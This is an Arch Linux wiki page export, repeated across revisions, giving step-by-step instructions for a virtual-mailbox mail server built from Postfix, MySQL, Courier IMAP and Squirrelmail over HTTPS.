==Configure Courier IMAP==<br />
===Step 1: /etc/courier-imap/imapd===<br />
<pre><br />
ADDRESS=127.0.0.1<br />
</pre><br />
<br />
We set the listen address to LOCAL ONLY. No outside connections.<br />
<br />
===Step 2: /etc/authlib/authdaemonrc===<br />
Remove all the modules from the authmodulelist line except for authmysql like so:<br />
<pre><br />
authmodulelist="authmysql"<br />
</pre><br />
<br />
===Step 3: /etc/authlib/authmysqlrc===<br />
<br />
Replace the ''entire'' file with the following:<br />
<pre><br />
MYSQL_SERVER localhost<br />
MYSQL_USERNAME postfixuser<br />
MYSQL_PASSWORD secret<br />
MYSQL_SOCKET /run/mysqld/mysqld.sock<br />
MYSQL_DATABASE postfix<br />
# MYSQL_NAME_FIELD name<br />
MYSQL_USER_TABLE users<br />
MYSQL_CLEAR_PWFIELD password<br />
MYSQL_UID_FIELD '5003'<br />
##note, this is the uid that we set in /etc/postfix/main.cf<br />
MYSQL_GID_FIELD '5003'<br />
##note, this is the gid that we set in /etc/postfix/main.cf<br />
MYSQL_LOGIN_FIELD email<br />
MYSQL_HOME_FIELD "/home/vmailer"<br />
MYSQL_MAILDIR_FIELD concat(domain,'/',email,'/')<br />
MYSQL_QUOTA_FIELD quota<br />
</pre><br />
Where secret is the mysql password for the user postfixuser.<br />
If you are using encrypted passwords by using MySQL's encrypt function. Use "MYSQL_CRYPT_PWFIELD columnname" instead of "MYSQL_CLEAR_PWFIELD columnname".<br />
<br />
===Step 4: Autorun imapd on system start===<br />
Edit the ''/etc/rc.conf'':<br />
<pre><br />
DAEMONS=(syslog-ng hotplug !pcmcia iptables network netfs crond sshd mysqld postfix authdaemond imapd httpd)<br />
</pre><br />
<br />
Again, make sure to add courier after postfix, after mysqld and after postfix, yet before httpd.<br />
<br />
If you already using [[systemd]], just run this command:<br />
{{bc|# systemctl enable authdaemond.service courier-imapd.service}}<br />
If authdaemond fails to start, make sure the folder ''/run/authdaemon'' exists.<br />
<br />
===Step 5: Fam and rpcbind===<br />
{{Accuracy|FAM should not be required anymore.|section=FAM is obsolete}}<br />
Courier-imap for arch comes compiled with FAM. This means portmap is also required. What used to be portmap is nowadays called rpcbind.<br />
If rpcbind is not already installed:<br />
<pre><br />
pacman -S rpcbind<br />
</pre><br />
<br />
Now edit /etc/fam/fam.conf<br />
<pre><br />
local_only = true<br />
idle_timeout = 0<br />
</pre><br />
Make sure the two above values are set.<br />
<br />
Now add rpcbind and fam to the daemons list in /etc/rc.conf<br />
<pre><br />
DAEMONS=(syslog-ng hotplug !pcmcia iptables network netfs crond sshd mysqld postfix rpcbind fam<br />
courier-imap httpd)<br />
</pre><br />
Make sure that rpcbind starts after network, but before fam, and fam starts before courier.<br />
Now start them.<br />
<pre><br />
/etc/rc.d/rpcbind start<br />
/etc/rc.d/fam start<br />
</pre><br />
<br />
===Step 6: Start courier imap===<br />
<pre><br />
/etc/rc.d/imapd start<br />
</pre><br />
With [[systemd]], run following command to start the ''imapd'' daemon:<br />
{{bc|# systemctl start courier-imapd.service}}<br />
check /var/log/mail.log for any errors.<br />
<br />
===Step 7: Test courier..===<br />
Lets see if courier is working:<br />
<pre><br />
telnet localhost imap<br />
Trying 127.0.0.1...<br />
Connected to localhost.localdomain.<br />
Escape character is '^]'.<br />
* OK [[CAPABILITY IMAP4rev1 ... ]] Courier-IMAP ready.<br />
<br />
A LOGIN "cactus@virtualdomain.tld" "password"<br />
A OK LOGIN Ok.<br />
<br />
B SELECT "Inbox"<br />
* FLAGS (\Draft \Answered ... \Recent)<br />
* OK [[PERMANENTFLAGS (\Draft \Answered ... \Seen)]] Limited<br />
* 8 EXISTS<br />
* 5 RECENT<br />
* OK [[UIDVALIDITY 1026858715]] Ok<br />
B OK [[READ-WRITE]] Ok<br />
<br />
Z LOGOUT<br />
* BYE Courier-IMAP server shutting down<br />
Z OK LOGOUT completed<br />
Connection closed by foreign host.<br />
</pre><br />
<br />
==Squirrelmail Installation==<br />
===Step 1: Install Squirrelmail===<br />
{{Accuracy|The squirrelmail package is currently dropped from the offical repositories and moved to the [[AUR]]}}<br />
[[pacman|Install]] the {{Pkg|squirrelmail}} package which is found in the [[Official Repositories|official repositories]].<br />
<br />
==Configure Squirrelmail==<br />
===Step 1: Create secure http site (https)===<br />
We are going to create a secure http site. This is so that people can login with plain text passwords, and not have to worry about the passwords getting sniffed (or worry less).<br />
<br />
====Step 1.1: Edit /etc/httpd/conf/extra/httpd-ssl.conf====<br />
Add appropriate information. Here is an example section:<br />
<pre><br />
<VirtualHost _default_:443><br />
# General setup for the virtual host<br />
DocumentRoot "/home/httpd/site.virtual/virtualdomain.tld/html"<br />
ServerName virtualdomain.tld:443<br />
ServerAdmin noemailonthisbox@localhost<br />
<Directory "/home/httpd/site.virtual/virtualdomain.tld/html"><br />
Options -Indexes +FollowSymLinks<br />
AllowOverride Options Indexes AuthConfig<br />
Order allow,deny<br />
Allow from all<br />
</Directory><br />
</pre><br />
<br />
====Step 1.15 Include httpd-ssl.conf in httpd.conf====<br />
Simply uncomment this line in your httpd.conf:<br />
<pre><br />
#Include conf/extra/httpd-ssl.conf<br />
</pre><br />
<br />
====Step 1.2: Create the directory structure====<br />
Now, create the directory you specified in the ssl.conf file.<br />
<pre><br />
mkdir -p /home/httpd/site.virtual/virtualdomain.tld/html<br />
</pre><br />
<br />
====Step 1.3: Generate a certificate====<br />
Follow the instructions here: [[LAMP#SSL]]<br />
<br />
====Step 1.4: Restart apache and test====<br />
Make sure that https is now working, and that you can get to the secure site.<br />
<br />
===Step 2: Put squirrelmail in the directory you created===<br />
Either extract squirrelmail, or move it from where the arch package puts it, into the directory you created for the secure http site.<br />
<br />
===Step 3: Run squirrelmail config utility===<br />
cd 'squirrelmaildir'/config<br />
<pre><br />
perl conf.pl<br />
</pre><br />
<br />
Make sure you select 'D', then type in courier and hit enter. Make sure your other options are correct as well.<br />
Note: If you use php with safe mode on, make sure that the data dir is owned by the same owner as all the files in the squirrelmail directory. With safe mode off, simply follow the squirrelmail setup directions.<br />
<br />
===Step 4: Test the squirrelmail setup===<br />
Point your browser to squirrelmail/src/configtest.php. Should you get an error on directory location, make sure php.ini has been set to allow access to them (open_basedir directive).<br />
<br />
===Step 5: Test squirrelmail===<br />
Log in with the test account. You will need to login with the form of: <br />
username: cactus@virtualdomain.tld <br />
password: secret<br />
<br />
Try sending email to non-existent local accounts. You should get an immediate bounce back. <br />
Try sending email to external good email accounts, as well as non-existent ones. <br />
Just general testing stuff.<br />
If everything works fine, then you can add other accounts to the mysql database, and away you go!<br />
<br />
====Troubleshooting====<br />
If you received an error similar to <br />
{{bc|1=Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/var/lib/squirrelmail/data) is not within the allowed path(s): \<br />
(/srv/http/:/home/:/tmp/:/usr/share/pear/) in /home/httpd/site.virtual/virtualdomain.tld/html/squirrelmail/src/configtest.php on line 303<br />
}}<br />
then edit {{ic|/etc/httpd/httpd.conf}}, and in the section {{ic|1=<Directory "/home/httpd/site.virtual/virtualdomain.tld/html">}}, add {{ic|php_admin_value open_basedir /home/httpd/site.virtual/virtualdomain.tld/html:/var/lib/squirrelmail/}}<br />
<br />
If you get an error similar to<br />
{{bc|1=Unknown user or password incorrect.}}<br />
you may have to create your user directories within vmailer like so:<br />
<pre><br />
mkdir -p /home/vmailer/mydomain.com/username<br />
mkdir /home/vmailer/mydomain.com/username/cur<br />
mkdir /home/vmailer/mydomain.com/username/new<br />
mkdir /home/vmailer/mydomain.com/username/tmp<br />
chmod -R 750 /home/vmailer<br />
chown -R vmailer.vmail /home/vmailer<br />
</pre><br />
where mydomain.com/username is the domain/username given within mysql.<br />
<br />
==See also==<br />
*[[Simple Virtual User Mail System]]<br />
*[[Courier MTA]]<br />
*[[SOHO Postfix]]<br />
<br />
==External links==<br />
*[http://linox.be/index.php/2005/07/13/44/ Out of Office] for squirrelmail<br />
*[https://help.ubuntu.com/community/Postfix Postfix Ubuntu documentation]<br />
*[http://www.gelens.org/archlinux-mailserver/ A Simple Mailserver on Arch Linux]<br />
*[http://sherlock.heroku.com/blog/2012/02/03/setting-up-postfix-to-use-gmail-as-an-smtp-relay-host-in-archlinux/ Use Gmail as an SMTP Relay]</div>Wakehttps://wiki.archlinux.org/index.php?title=Postfix&diff=235019Postfix2012-11-12T05:25:32Z<p>Wake: /* Step 1: Start postfix */ ref Daemons page</p>
<hr />
<div>[[Category:Mail Server]]<br />
From [http://www.postfix.org/ Postfix's site]:<br />
:"''Postfix attempts to be fast, easy to administer, and secure, while at the same time being sendmail compatible enough to not upset existing users. Thus, the outside has a sendmail-ish flavor, but the inside is completely different.''"<br />
<br />
The goal of this article is to setup postfix for virtual mailbox delivery only. There will be no delivery to user accounts on the system ({{ic|/etc/passwd}}). Further, access will only be available via a web mail frontend (squirrelmail), no direct pop3 or imap access will be granted. It should be fairly easy to allow those additional features given the information below, but it is not within the scope of this document.<br />
<br />
For a local mail delivery guide, see: [[Local Mail Delivery with Postfix]].<br />
<br />
==Required packages==<br />
*postfix (compiled for mysql support)<br />
*courier-imap<br />
*squirrelmail<br />
*mysql<br />
*apache<br />
*ssl<br />
<br />
If you have trouble finding a package specific to this How-To, try the resources link at the bottom.<br />
<br />
==Postfix Installation==<br />
===Step 1: Install Postfix===<br />
Postfix with MySQL enabled is required for this HOW-TO.<br />
So we will [[pacman|install]] the package called {{Pkg|postfix}} which can be found in the [[Official Repositories|official repositories]].<br />
<br />
===Step 2: Check /etc/passwd, /etc/group===<br />
Make sure that the following shows up in {{ic|/etc/passwd}}:<br />
postfix:x:73:73::/var/spool/postfix:/bin/false<br />
<br />
Make sure that the following shows up in {{ic|/etc/group}}:<br />
postdrop:x:75:<br />
postfix:x:73:<br />
<br />
{{Note|Postfix can be made to run in a chroot. This document does not currently cover this and might be added later.}}<br />
<br />
==Postfix Configuration==<br />
===Step 1: Setup MX record ===<br />
<br />
An MX record should point to the mail host. Usually this is done from configuration interface of your domain provider.<br />
<br />
A mail exchanger record (MX record) is a type of resource record in the Domain Name System that specifies a mail server responsible for accepting email messages on behalf of a recipient's domain. <br />
<br />
When an e-mail message is sent through the Internet, the sending mail transfer agent queries the Domain Name System for MX records of each recipient's domain name. This query returns a list of host names of mail exchange servers accepting incoming mail for that domain and their preferences. The sending agent then attempts to establish an SMTP connection to one of these servers, starting with the one with the smallest preference number, delivering the message to the first server with which a connection can be made. <br />
<br />
{{Note|Some mail servers will not deliver mail to you if your MX record points to a CNAME. For best results, always point an MX record to an A record definition. For more information, see e.g. [https://secure.wikimedia.org/wikipedia/en/wiki/List_of_DNS_record_types Wikipedia's List of DNS Record Types].}}<br />
<br />
===Step 2: /etc/postfix/master.cf===<br />
This is the Pipeline configuration file, in which you can put your new pipes e.g. to check for Spam!<br />
<br />
===Step 3: /etc/postfix/main.cf===<br />
====Step 3.1 myhostname====<br />
set myhostname if your mail server has multiple domains, and you do not want the primary domain to be the mail host. The default is to use the result of a gethostname() call if nothing is specified.<br />
For our purposes we will just set it as follows:<br />
<pre><br />
myhostname = mail.nospam.net<br />
</pre><br />
This is assuming that a DNS A record, and an MX record both point to mail.nospam.net<br />
<br />
====Step 3.2 mydomain====<br />
this is usually the value of myhostname, minus the first part. If your domain is wonky, then just set it manually.<br />
<pre><br />
mydomain = nospam.net<br />
</pre><br />
<br />
====Step 3.3 myorigin====<br />
this is where the email will be seen as being sent from. I usually set this to the value of mydomain. For simple servers, this works fine. This is for mail originating from a local account. Since we are not doing local delivery (except sending), then this is not really as important as it normally would be.<br />
<pre><br />
myorigin = $mydomain<br />
</pre><br />
<br />
====Step 3.4 mydestination====<br />
This is the lookup for local users. Since we are not going to deliver internet mail for any local users, set this to localhost only.<br />
<pre><br />
mydestination = localhost<br />
</pre><br />
<br />
====Step 3.5 mynetworks and mynetwork_style====<br />
Both of these control relaying, and whom is allowed to. We do not want any relaying.<br />
For our sakes, we will simply set mynetwork_style to host, as we are trying to make a standalone postfix host, that people with use webmail on. No relaying, no other MTA's. Just webmail.<br />
<pre><br />
mynetworks_style = host<br />
</pre><br />
<br />
====Step 3.6 relaydomains====<br />
This controls the destinations that postfix will relay TO. The default value is $mydestination. This should be fine for now.<br />
<pre><br />
relay_domains = $mydestination<br />
</pre><br />
<br />
====Step 3.7 home_mailbox====<br />
This setting controls how mail is stored for the users.<br />
Set this to "Maildir/", as courier IMAP requires Maildir style mail storage. This is a good thing. Maildir format mailboxes remove the possible race conditions that can occur with old style mbox formats. No more need to deal with file locking. The '/' at the end is REQUIRED.<br />
<pre><br />
home_mailbox = Maildir/<br />
</pre><br />
<br />
====Step 3.8 virtual_mail====<br />
Virtual mail is mail that does not map to a user account (/etc/passwd). This is where all the email for the system will be kept. We are not doing local delivery, remember, so if you want a user that has the same name as a local user, just make a virtual account with the same name.<br />
First thing we need to do is add the following:<br />
<pre><br />
virtual_mailbox_domains = virtualdomain.tld<br />
virtual_alias_maps = hash:/etc/postfix/virtual_alias, mysql:/etc/postfix/mysql_virtual_forwards.cf<br />
virtual_mailbox_domains = mysql:/etc/postfix/mysql_virtual_domains.cf<br />
virtual_mailbox_maps = mysql:/etc/postfix/mysql_virtual_mailboxes.cf<br />
virtual_mailbox_base = /home/vmailer<br />
virtual_uid_maps = static:5003<br />
virtual_gid_maps = static:5003<br />
virtual_minimum_uid = 5003<br />
virtual_mailbox_limit = 51200000<br />
</pre><br />
<br />
virtual_mailbox_domains is a list of the domains that you want to receive mail for. This CANNOT be the same thing that is listed in mydestination. That is why we left mydestination to be localhost only.<br />
virtual_mailbox_maps will contain the info about the virtual users and their mailbox locations. We are using a hash file to store the more permanent maps, and these will override the forwards in the mysql database.<br />
<br />
virtual_mailbox_base is the base dir where the virtual mailboxes will be stored.<br />
The gid and uid maps are the real system user account that the virtual mail will be owned by. This is for storage purposes. Since we will be using a web interface, and do not want people accessing this by any other means, we will be creating this account later with no login access.<br />
Virtual_mailbox_limit controls the size of the mailbox. I do not know how well this works yet. I have set the size above to about 50MB.<br />
====Step 3.9 Default message &amp; mailbox size limits====<br />
Postfix imposes both message and mailbox size limits by default. The message_size_limit controls the maximum size in bytes of a message, including envelope information. (default 10240000) The mailbox_size_limit controls the maximum size of any local individual mailbox or maildir file. This limits the size of '''any''' file that is written to upon local delivery, '''including files written by external commands''' (i.e. procmail) that are executed by the local delivery agent. (default is 51200000, set to 0 for no limit) If bounced message notifications are generated, check the size of the local mailbox under /var/spool/mail and use postconf to check these size limits:<br />
<br />
<pre><br />
supersff:~> postconf -d mailbox_size_limit<br />
mailbox_size_limit = 51200000<br />
supersff:~> postconf -d message_size_limit<br />
message_size_limit = 10240000<br />
</pre><br />
<br />
===Step 4. /etc/postfix/aliases===<br />
We need to map some aliases to real accounts. The default setup by arch looks pretty good here. =D<br />
Uncomment the following line, and change it to a real account. I put the user account on the box that I use. Best not to just send mail to root, because you do not want to be logging in as root or checking email as root. Not good. Sudo is your friend, and so is forwarding root mail. Since this is for local delivery only (syslogs and stuff), it is still within the realm of mydestination.<br />
<pre><br />
root: cactus<br />
</pre><br />
Once you have finished editing /etc/postfix/aliases you must run the postalias command.<br />
<pre><br />
postalias /etc/postfix/aliases<br />
</pre><br />
<br />
===Step 5. /etc/postfix/virtual_alias===<br />
Create /etc/postfix/virtual_alias with the following contents<br />
<pre><br />
MAILER-DAEMON: postmaster<br />
postmaster: root<br />
<br />
# General redirections for pseudo accounts<br />
bin: root<br />
daemon: root<br />
named: root<br />
nobody: root<br />
uucp: root<br />
www: root<br />
ftp-bugs: root<br />
postfix: root<br />
<br />
# Put your local aliases here.<br />
<br />
# Well-known aliases<br />
manager: root<br />
dumper: root<br />
operator: root<br />
abuse: postmaster<br />
<br />
# trap decode to catch security attacks<br />
decode: root<br />
<br />
# Person who should get root's mail. Don't receive mail as root!<br />
root: cactus@virtualdomain.tld<br />
</pre><br />
<br />
Then run the postalias command on it.<br />
<pre><br />
postalias /etc/postfix/virtual_alias<br />
</pre><br />
<br />
===Step 6. mysql_virtual_domains.cf===<br />
Create the /etc/postfix/mysql_virtual_domains.cf file with the following (or similar) contents:<br />
<pre><br />
user = postfixuser<br />
password = XXXXXXXXXX<br />
hosts = localhost<br />
dbname = postfix<br />
table = domains<br />
select_field = 'virtual'<br />
where_field = domain<br />
</pre><br />
<br />
===Step 7. mysql_virtual_mailboxes.cf===<br />
Create the /etc/postfix/mysql_virtual_mailboxes.cf file with the following (or similar) contents:<br />
<pre><br />
user = postfixuser<br />
password = XXXXXXXXXX<br />
hosts = localhost<br />
dbname = postfix<br />
table = users<br />
select_field = concat(domain,'/',email,'/')<br />
where_field = email<br />
</pre><br />
<br />
===Step 8. mysql_virtual_forwards.cf===<br />
Create the /etc/postfix/mysql_virtual_forwards.cf file with the following (or similar) contents:<br />
<pre><br />
user = postfixuser<br />
password = XXXXXXXXXX<br />
hosts = localhost<br />
dbname = postfix<br />
table = forwardings<br />
select_field = destination<br />
where_field = source<br />
</pre><br />
<br />
===Step 9. postfix check===<br />
Run the postfix check command. It should output anything that you might have done wrong in a config file. To see all of your configs, type <kbd>postconf</kbd>. To see how you differ from the defaults, try <kbd>postconf -n</kbd><br />
<br />
===Step 10. Enable and Start the Daemon===<br />
Enabling the service will automatically start postfix at boot, but needs to be started manually for the first time.<br />
<br />
# systemctl enable postfix.service<br />
# systemctl start postfix.service<br />
<br />
===Step 11. newuser===<br />
We need to create the user for storing the virtual mail. Create a vmailuser as follows:<br />
<pre><br />
groupadd -g 5003 vmail<br />
useradd -g vmail -u 5003 -d /home/vmailer -s /bin/false vmailer<br />
mkdir /home/vmailer<br />
chown vmailer.vmail /home/vmailer<br />
chmod -R 750 /home/vmailer<br />
passwd vmailer<br />
</pre><br />
note that 5003 is the gid specified in the postfix main.cf file.<br />
note that 5003 is the uid specified in the postfix main.cf file.<br />
<br />
==Mysql configuration==<br />
===Step 1. Create a mysql Database===<br />
Create mysql database called 'postfix', or something similar.<br />
<br />
CREATE DATABASE postfix;<br />
USE postfix;<br />
<br />
===Step 2. Setup table structure.===<br />
Import the following table structure.<br />
<pre><br />
CREATE TABLE `domains` (<br />
`domain` varchar(50) NOT NULL default '',<br />
PRIMARY KEY (`domain`),<br />
UNIQUE KEY `domain` (`domain`)<br />
);<br />
<br />
<br />
CREATE TABLE `forwardings` (<br />
`source` varchar(80) NOT NULL default '',<br />
`destination` text NOT NULL,<br />
PRIMARY KEY (`source`)<br />
);<br />
<br />
CREATE TABLE `users` (<br />
`email` varchar(80) NOT NULL default '',<br />
`password` varchar(20) NOT NULL default '',<br />
`quota` varchar(20) NOT NULL default '20971520',<br />
`domain` varchar(255) NOT NULL default '',<br />
UNIQUE KEY `email` (`email`)<br />
);<br />
</pre><br />
<br />
===Step 3. Create a mysql user===<br />
Add a user for postfix to use. Something like \"postfixuser\".<br />
Give permissions for postfix user to the table. This user should be listed in the /etc/postfix/mysql''virtual''domains.cf file.<br />
<br />
The [http://dev.mysql.com/doc/refman/5.5/en/server-administration.html official reference manual] has a detailed guide on user management and server administration in general.<br />
<br />
The following is just an example for creation of 'postfixuser' with password 'XXXXXXXXXX'.<br />
Note that the GRANT statements need to be executed after creating the tables in the next step.<br />
<br />
CREATE USER 'postfixuser' IDENTIFIED BY 'XXXXXXXXXX';<br />
GRANT SELECT, INSERT, UPDATE, DELETE ON domains TO postfixuser;<br />
GRANT SELECT, INSERT, UPDATE, DELETE ON forwardings TO postfixuser;<br />
GRANT SELECT, INSERT, UPDATE, DELETE ON users TO postfixuser;<br />
<br />
===Step 4. Add a domain.===<br />
<pre><br />
INSERT INTO `domains` VALUES ('virtualdomain.tld');<br />
</pre><br />
<br />
===Step 5. Add a user.===<br />
<pre><br />
INSERT INTO `users` VALUES ('cactus@virtualdomain.tld', 'secret', <br />
'20971520', 'virtualdomain.tld');<br />
</pre><br />
<br />
The above creates the user and sets a password as secret. <br />
<br />
This will allow you to use encrypted passwords<br />
<br />
<pre><br />
INSERT INTO `users` VALUES ('cactus@virtualdomain.tld', ENCRYPT('secret'), <br />
'20971520', 'virtualdomain.tld');<br />
</pre><br />
<br />
==Test Postfix==<br />
===Step 1: Start postfix===<br />
See [[Daemons#Starting_manually]]<br />
<br />
===Step 1: Test postfix===<br />
Lets see if postfix is going to deliver mail for our test user.<br />
<pre><br />
telnet servername 25<br />
ehlo testmail.org<br />
mail from:<test@testmail.org><br />
rcpt to:<cactus@virtualdomain.tld><br />
data<br />
This is a test email.<br />
<br />
.<br />
quit<br />
</pre><br />
==== Error response ====<br />
451 4.3.0 <lisi@test.com>:Temporary lookup failure<br />
maybe you have entered the wrong user/pass for mysql or the mysql socket is not in the right place.<br />
<br />
<br />
==== See that you have received a email ====<br />
now type the following:<br />
<pre><br />
find /home/vmailer<br />
</pre><br />
<br />
you should see something like the following:<br />
<pre><br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld/tmp<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld/cur<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld/new<br />
/home/vmailer/virtualdomain.tld/cactus@virtualdomain.tld/new/1102974226.2704_0.bonk.testmail.org<br />
</pre><br />
The key is the last entry. This is an actual email. If you see that, it is working.<br />
<br />
==Courier IMAP Installation==<br />
===Step 1: Install Courier IMAP===<br />
{{Accuracy|The courier packages are currently dropped from the offical repositories and moved to the [[AUR]]}}<br />
<pre><br />
pacman -S courier-imap<br />
</pre><br />
<br />
==Configure Courier IMAP==<br />
===Step 1: /etc/courier-imap/imapd===<br />
<pre><br />
ADDRESS=127.0.0.1<br />
</pre><br />
<br />
We set the listen address to LOCAL ONLY. No outside connections.<br />
<br />
===Step 2: /etc/authlib/authdaemonrc===<br />
Remove all the modules from the authmodulelist line except for authmysql like so:<br />
<pre><br />
authmodulelist="authmysql"<br />
</pre><br />
<br />
===Step 3: /etc/authlib/authmysqlrc===<br />
<br />
Replace the ''entire'' file with the following:<br />
<pre><br />
MYSQL_SERVER localhost<br />
MYSQL_USERNAME postfixuser<br />
MYSQL_PASSWORD secret<br />
MYSQL_SOCKET /run/mysqld/mysqld.sock<br />
MYSQL_DATABASE postfix<br />
# MYSQL_NAME_FIELD name<br />
MYSQL_USER_TABLE users<br />
MYSQL_CLEAR_PWFIELD password<br />
MYSQL_UID_FIELD '5003'<br />
##note, this is the uid that we set in /etc/postfix/main.cf<br />
MYSQL_GID_FIELD '5003'<br />
##note, this is the gid that we set in /etc/postfix/main.cf<br />
MYSQL_LOGIN_FIELD email<br />
MYSQL_HOME_FIELD "/home/vmailer"<br />
MYSQL_MAILDIR_FIELD concat(domain,'/',email,'/')<br />
MYSQL_QUOTA_FIELD quota<br />
</pre><br />
Where secret is the mysql password for the user postfixuser.<br />
If you are using encrypted passwords by using MySQL's encrypt function. Use "MYSQL_CRYPT_PWFIELD columnname" instead of "MYSQL_CLEAR_PWFIELD columnname".<br />
<br />
===Step 4: Autorun imapd on system start===<br />
Edit the ''/etc/rc.conf'':<br />
<pre><br />
DAEMONS=(syslog-ng hotplug !pcmcia iptables network netfs crond sshd mysqld postfix authdaemond imapd httpd)<br />
</pre><br />
<br />
Again, make sure to add courier after postfix, after mysqld and after postfix, yet before httpd.<br />
<br />
If you already using [[systemd]], just run this command:<br />
{{bc|# systemctl enable authdaemond.service courier-imapd.service}}<br />
If authdaemond fails to start, make sure the folder ''/run/authdaemon'' exists.<br />
<br />
===Step 5: Fam and rpcbind===<br />
{{Accuracy|FAM should not be required anymore.|section=FAM is obsolete}}<br />
Courier-imap for arch comes compiled with FAM. This means portmap is also required. What used to be portmap is nowadays called rpcbind.<br />
If rpcbind is not already installed:<br />
<pre><br />
pacman -S rpcbind<br />
</pre><br />
<br />
Now edit /etc/fam/fam.conf<br />
<pre><br />
local_only = true<br />
idle_timeout = 0<br />
</pre><br />
Make sure the two above values are set.<br />
<br />
Now add rpcbind and fam to the daemons list in /etc/rc.conf<br />
<pre><br />
DAEMONS=(syslog-ng hotplug !pcmcia iptables network netfs crond sshd mysqld postfix rpcbind fam<br />
courier-imap httpd)<br />
</pre><br />
Make sure that rpcbind starts after network, but before fam, and fam starts before courier.<br />
Now start them.<br />
<pre><br />
/etc/rc.d/rpcbind start<br />
/etc/rc.d/fam start<br />
</pre><br />
<br />
===Step 6: Start courier imap===<br />
<pre><br />
/etc/rc.d/imapd start<br />
</pre><br />
With [[systemd]], run following command to start the ''imapd'' daemon:<br />
{{bc|# systemctl start courier-imapd.service}}<br />
check /var/log/mail.log for any errors.<br />
<br />
===Step 7: Test courier..===<br />
Lets see if courier is working:<br />
<pre><br />
telnet localhost imap<br />
Trying 127.0.0.1...<br />
Connected to localhost.localdomain.<br />
Escape character is '^]'.<br />
* OK [[CAPABILITY IMAP4rev1 ... ]] Courier-IMAP ready.<br />
<br />
A LOGIN "cactus@virtualdomain.tld" "password"<br />
A OK LOGIN Ok.<br />
<br />
B SELECT "Inbox"<br />
* FLAGS (\Draft \Answered ... \Recent)<br />
* OK [[PERMANENTFLAGS (\Draft \Answered ... \Seen)]] Limited<br />
* 8 EXISTS<br />
* 5 RECENT<br />
* OK [[UIDVALIDITY 1026858715]] Ok<br />
B OK [[READ-WRITE]] Ok<br />
<br />
Z LOGOUT<br />
* BYE Courier-IMAP server shutting down<br />
Z OK LOGOUT completed<br />
Connection closed by foreign host.<br />
</pre><br />
<br />
==Squirrelmail Installation==<br />
===Step 1: Install Squirrelmail===<br />
{{Accuracy|The squirrelmail package is currently dropped from the offical repositories and moved to the [[AUR]]}}<br />
[[pacman|Install]] the {{Pkg|squirrelmail}} package which is found in the [[Official Repositories|official repositories]].<br />
<br />
==Configure Squirrelmail==<br />
===Step 1: Create secure http site (https)===<br />
We are going to create a secure http site. This is so that people can login with plain text passwords, and not have to worry about the passwords getting sniffed (or worry less).<br />
<br />
====Step 1.1: Edit /etc/httpd/conf/extra/httpd-ssl.conf====<br />
Add appropriate information. Here is an example section:<br />
<pre><br />
<VirtualHost _default_:443><br />
# General setup for the virtual host<br />
DocumentRoot "/home/httpd/site.virtual/virtualdomain.tld/html"<br />
ServerName virtualdomain.tld:443<br />
ServerAdmin noemailonthisbox@localhost<br />
<Directory "/home/httpd/site.virtual/virtualdomain.tld/html"><br />
Options -Indexes +FollowSymLinks<br />
AllowOverride Options Indexes AuthConfig<br />
Order allow,deny<br />
Allow from all<br />
</Directory><br />
</pre><br />
<br />
====Step 1.15 Include httpd-ssl.conf in httpd.conf====<br />
Simply uncomment this line in your httpd.conf:<br />
<pre><br />
#Include conf/extra/httpd-ssl.conf<br />
</pre><br />
<br />
====Step 1.2: Create the directory structure====<br />
Now, create the directory you specified in the ssl.conf file.<br />
<pre><br />
mkdir -p /home/httpd/site.virtual/virtualdomain.tld/html<br />
</pre><br />
<br />
====Step 1.3: Generate a certificate====<br />
Follow the instructions here: [[LAMP#SSL]]<br />
<br />
====Step 1.4: Restart apache and test====<br />
Make sure that https is now working, and that you can get to the secure site.<br />
<br />
===Step 2: Put squirrelmail in the directory you created===<br />
Either extract squirrelmail, or move it from where the arch package puts it, into the directory you created for the secure http site.<br />
<br />
===Step 3: Run squirrelmail config utility===<br />
cd 'squirrelmaildir'/config<br />
<pre><br />
perl conf.pl<br />
</pre><br />
<br />
Make sure you select 'D', then type in courier and hit enter. Make sure your other options are correct as well.<br />
Note: If you use php with safe mode on, make sure that the data dir is owned by the same owner as all the files in the squirrelmail directory. With safe mode off, simply follow the squirrelmail setup directions.<br />
<br />
===Step 4: Test the squirrelmail setup===<br />
Point your browser to squirrelmail/src/configtest.php. Should you get an error on directory location, make sure php.ini has been set to allow access to them (open_basedir directive).<br />
<br />
===Step 5: Test squirrelmail===<br />
Log in with the test account. You will need to login with the form of: <br />
username: cactus@virtualdomain.tld <br />
password: secret<br />
<br />
Try sending email to non-existent local accounts. You should get an immediate bounce back. <br />
Try sending email to external good email accounts, as well as non-existent ones. <br />
Just general testing stuff.<br />
If everything works fine, then you can add other accounts to the mysql database, and away you go!<br />
<br />
====Troubleshooting====<br />
If you received an error similar to <br />
{{bc|1=Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/var/lib/squirrelmail/data) is not within the allowed path(s): \<br />
(/srv/http/:/home/:/tmp/:/usr/share/pear/) in /home/httpd/site.virtual/virtualdomain.tld/html/squirrelmail/src/configtest.php on line 303<br />
}}<br />
then edit {{ic|/etc/httpd/httpd.conf}}, and in the section {{ic|1=<Directory "/home/httpd/site.virtual/virtualdomain.tld/html">}}, add {{ic|php_admin_value open_basedir /home/httpd/site.virtual/virtualdomain.tld/html:/var/lib/squirrelmail/}}<br />
<br />
If you get an error similar to<br />
{{bc|1=Unknown user or password incorrect.}}<br />
you may have to create your user directories within vmailer like so:<br />
<pre><br />
mkdir -p /home/vmailer/mydomain.com/username<br />
mkdir /home/vmailer/mydomain.com/username/cur<br />
mkdir /home/vmailer/mydomain.com/username/new<br />
mkdir /home/vmailer/mydomain.com/username/tmp<br />
chmod -R 750 /home/vmailer<br />
chown -R vmailer.vmail /home/vmailer<br />
</pre><br />
where mydomain.com/username is the domain/username given within mysql.<br />
<br />
==See also==<br />
*[[Simple Virtual User Mail System]]<br />
*[[Courier MTA]]<br />
*[[SOHO Postfix]]<br />
<br />
==External links==<br />
*[http://linox.be/index.php/2005/07/13/44/ Out of Office] for squirrelmail<br />
*[https://help.ubuntu.com/community/Postfix Postfix Ubuntu documentation]<br />
*[http://www.gelens.org/archlinux-mailserver/ A Simple Mailserver on Arch Linux]<br />
